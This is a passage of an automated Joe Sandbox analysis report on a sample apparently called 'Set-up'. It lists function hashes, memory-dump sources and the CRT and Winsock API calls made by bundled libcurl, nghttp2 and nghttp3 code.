                          • Instruction ID: 08f919a020d1b9bf1a27563d6be90a3c11a34ff820ca063f654b5e9425a57e7e
                          • Opcode Fuzzy Hash: f63d7486fb65e14543cc7d6438b724dc43493abc48f1d2901c90de8041bd027b
                          • Instruction Fuzzy Hash: B90149F1B5830136E3303764BC43F6B2649CBE5B15F084635F708A72C3F6E568A44261
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID:
                          • String ID: $rwx-tTsS
                          • API String ID: 0-331890564
                          • Opcode ID: 4ff7302202cce93b368fecc72bede96e23d362bd571b1a8640aaceb6081c5f0e
                          • Instruction ID: 119a779b190b49f102b7300c5bab842dcd138b111d610bbca2e90f61474caa37
                          • Opcode Fuzzy Hash: 4ff7302202cce93b368fecc72bede96e23d362bd571b1a8640aaceb6081c5f0e
                          • Instruction Fuzzy Hash: 7EB15B70D08741DFE7788F14C4A473BB7E2EB51724F14CA0DD09A86A92D739E885CB9A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID:
                          • String ID: $rwx-tTsS
                          • API String ID: 0-331890564
                          • Opcode ID: 3fcc948cd44a8f9c607cd37fadce8533d265e8ed1a81592ace7cec70b6e2f0b1
                          • Instruction ID: 40f144e5ea65781d2aa275be92828251d267054c970eef66c0d6c31afb3fe186
                          • Opcode Fuzzy Hash: 3fcc948cd44a8f9c607cd37fadce8533d265e8ed1a81592ace7cec70b6e2f0b1
                          • Instruction Fuzzy Hash: E8B18D70D08741DFE7788F14C0A473BB7E1EB51324F14CA0DD09A86A92D739E886CB9A
                          APIs
                          • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(005BF53C,nghttp3_qpack.c,00000811,?,?), ref: 000CE866
                          • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(space <= ctx->max_dtable_capacity,nghttp3_qpack.c,0000080D,?,?,?,?,?,000D077F,?,?,00000000,00000000), ref: 000CE87B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: _assert
                          • String ID: nghttp3_qpack.c$space <= ctx->max_dtable_capacity
                          • API String ID: 1222420520-1270044496
                          • Opcode ID: 1f8ceb2707eeb720649abfb49fb9120113f7ef0f12c1a623c521762593895370
                          • Instruction ID: fffc6a74e66334cc528a71f7879df522a34315e631d93f0604c8a645027eeee3
                          • Opcode Fuzzy Hash: 1f8ceb2707eeb720649abfb49fb9120113f7ef0f12c1a623c521762593895370
                          • Instruction Fuzzy Hash: C181A0B5A006419FD720DF24D842F6AB7F5BF44318F08862CE88A97752EB31F965CB91
                          APIs
                          • strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000002E), ref: 000D83AD
                          • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(HOSTALIASES), ref: 000D83C5
                            • Part of subcall function 000E77B0: fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,005C5FED,00000000,00000000,?,?,?,000E9882,?,00000000), ref: 000E77DD
                            • Part of subcall function 000E77B0: fseek.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000000,00000002,?,00000000), ref: 000E77F0
                            • Part of subcall function 000E77B0: fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,00000000), ref: 000E7802
                          • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 000D853F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: _stricmpfclosefopenfseekgetenvstrchr
                          • String ID: HOSTALIASES
                          • API String ID: 1675145106-255135673
                          • Opcode ID: d6120b07775e559119c51d373695860ece39612d1cbf07f48c22a6444bc92d2a
                          • Instruction ID: ec48a40540078f0189ae904af09d4797ef13df2bb61b24ec28c7d8aac4b3b410
                          • Opcode Fuzzy Hash: d6120b07775e559119c51d373695860ece39612d1cbf07f48c22a6444bc92d2a
                          • Instruction Fuzzy Hash: B151D8A1D083C25BE720DB21AD017BB72D89FE5348F00D92EFD8991253FB75D5948B62
                          APIs
                          • _stat64.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(000254E6), ref: 00028235
                          • strrchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,0000002F), ref: 000282D4
                          • strrchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,0000005C), ref: 000282E1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: strrchr$_stat64
                          • String ID: mime.c
                          • API String ID: 2771713950-3378952128
                          • Opcode ID: 8590c66ebfd42ed03e23e8a89c4f7df18272d1ef9cb0fa803a00a4af509c7929
                          • Instruction ID: 689b0670d7b59fb892680b30ddfa020c378876dedd99cfaa175d743e1a3c8f3d
                          • Opcode Fuzzy Hash: 8590c66ebfd42ed03e23e8a89c4f7df18272d1ef9cb0fa803a00a4af509c7929
                          • Instruction Fuzzy Hash: 2E51B5B5A057109BEF10DF14EC867AB3BA4AF50B14F048168EC1C9F2C6FBB5DA158791
                          APIs
                          • _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000,?,?,?,00093B19,?,?,?,?,?), ref: 000A671D
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(0000002C,?,?), ref: 000A682B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: _time64memcpy
                          • String ID: %c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c$curl_ntlm_core.c
                          • API String ID: 1622878224-1914695719
                          • Opcode ID: 50f53db0955f63d88a7a4cffe575c28dd72144828f2dd689271bfd7e81f57f34
                          • Instruction ID: a0421edf7afc0d4efcdaa34c1308a92567cec6a1636eeddc1945123971ee4654
                          • Opcode Fuzzy Hash: 50f53db0955f63d88a7a4cffe575c28dd72144828f2dd689271bfd7e81f57f34
                          • Instruction Fuzzy Hash: FE418DB29087449BC314DF69C8816ABB7F4EFD9700F048A1EF9899B351E771E9848B52
                          APIs
                          • htons.WS2_32(?), ref: 000643D8
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00064409
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000020,?,00000001), ref: 00064457
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: htonsmemcpystrlen
                          • String ID: curl_addrinfo.c
                          • API String ID: 2973076469-1838508774
                          • Opcode ID: e3bf494b1dd74e13aff725668508a5f577c32e11ca9bf22b472c6e1fd202aaf1
                          • Instruction ID: ac5a6449844a83501cbaad493a96d0a361f2744de6eeaf094685c21aa2fe6337
                          • Opcode Fuzzy Hash: e3bf494b1dd74e13aff725668508a5f577c32e11ca9bf22b472c6e1fd202aaf1
                          • Instruction Fuzzy Hash: 994198B5A04705AFD710CF58D881A6AB7E5FF98314F04892DFD898B351E770E990CB91
                          APIs
                          • _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000,?,?,?), ref: 0005665D
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 0005670E
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000010), ref: 0005671C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: strlen$_time64
                          • String ID: altsvc.c
                          • API String ID: 2413861649-3234676706
                          • Opcode ID: 941c5a0ed9f7765199e9d9e9238449db3be34be02a13da645bf4a033aa7fe8a2
                          • Instruction ID: 1ecf62e5cc35bfa80a2185b432e1831a425634dd60d4fc8212126964104a6227
                          • Opcode Fuzzy Hash: 941c5a0ed9f7765199e9d9e9238449db3be34be02a13da645bf4a033aa7fe8a2
                          • Instruction Fuzzy Hash: 4A31B4B1E08310ABE7509E20AC82E5F7BD4AF58755F444538FD4D9B242F672DD18C792
                          APIs
                          • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS,nghttp3_conn.c,0000060E), ref: 000C435F
                          • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS,nghttp3_conn.c,0000060E,?,?,?,00000000,?), ref: 000C43EF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: _assert
                          • String ID: nghttp3_conn.c$tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS
                          • API String ID: 1222420520-4133914617
                          • Opcode ID: 933de51f72ce2b9e4b9c6306510cb6da745c6631fa38785ce42437b44d6f5308
                          • Instruction ID: 9420105480ff8d6cc4049a2439f3665d5c8d4a1730372ce05ec2dd6a6522a382
                          • Opcode Fuzzy Hash: 933de51f72ce2b9e4b9c6306510cb6da745c6631fa38785ce42437b44d6f5308
                          • Instruction Fuzzy Hash: 1931A272500241AFD7119F54EC09FDA3BFABF85319F0904B8E8049B1A3EB32E528C761
                          APIs
                          • memmove.API-MS-WIN-CRT-PRIVATE-L1-1-0(C2E85040,-0000000F,00000000,?,?,?,?,000C70DF,00000001,?,?,?), ref: 000CA0E5
                            • Part of subcall function 000CA140: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000011,?,?), ref: 000CA29A
                          • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(ksl->head,nghttp3_ksl.c,00000218,?,?,?,?,000C70DF,00000001,?,?,?), ref: 000CA135
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: _assertmemcpymemmove
                          • String ID: ksl->head$nghttp3_ksl.c
                          • API String ID: 374949274-2784241221
                          • Opcode ID: f56105ce0e485dd6d654b9c2202a4c8ba238d1466fecdab59bdaa1f894dfe138
                          • Instruction ID: 79b41e6c7e6b6ee7dba80131f9631e4b2b7c4149127d97ebc4fef77f0a06824b
                          • Opcode Fuzzy Hash: f56105ce0e485dd6d654b9c2202a4c8ba238d1466fecdab59bdaa1f894dfe138
                          • Instruction Fuzzy Hash: AB113D703002059FDB149F14D985EAEFBA6FB86319F1CD65DE9498B642D334EC41CB92
                          APIs
                          • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?), ref: 000BE148
                          • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(nghttp2_buf_avail(buf) >= padlen - 1,nghttp2_frame.c,000004B6,?,?,?,?,000B2615,?,?,?,?), ref: 000BE16E
                          Strings
                          • nghttp2_frame.c, xrefs: 000BE164
                          • nghttp2_buf_avail(buf) >= padlen - 1, xrefs: 000BE169
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: _assertmemset
                          • String ID: nghttp2_buf_avail(buf) >= padlen - 1$nghttp2_frame.c
                          • API String ID: 1036001119-2332821266
                          • Opcode ID: c245e346fb42b5f91eb952d89abaa3fc816ff5e19cae038bf77ab771b05283ce
                          • Instruction ID: b8042e7677d06da44fbda6ebd980267f81ebfce71c836d54db906ab115ddba19
                          • Opcode Fuzzy Hash: c245e346fb42b5f91eb952d89abaa3fc816ff5e19cae038bf77ab771b05283ce
                          • Instruction Fuzzy Hash: 0F11EE71A00B8AAFC300CF24D844E85FBA5FF95325F04C659E8580B712D731E928CBA0
                          APIs
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-0000000C,?,?), ref: 0004C685
                            • Part of subcall function 000273F0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,#HttpOnly_,?,0002CA95,0059DE58,00000467,mprintf.c), ref: 0002741D
                            • Part of subcall function 000273F0: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000008,?,00000001), ref: 00027445
                            • Part of subcall function 000273F0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,0002CA95,0059DE58,00000467,mprintf.c), ref: 00027486
                            • Part of subcall function 000273F0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 000274AA
                            • Part of subcall function 000273F0: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000274B2
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-0000000C,?,?), ref: 0004C6CF
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-0000000C,?,?), ref: 0004C719
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
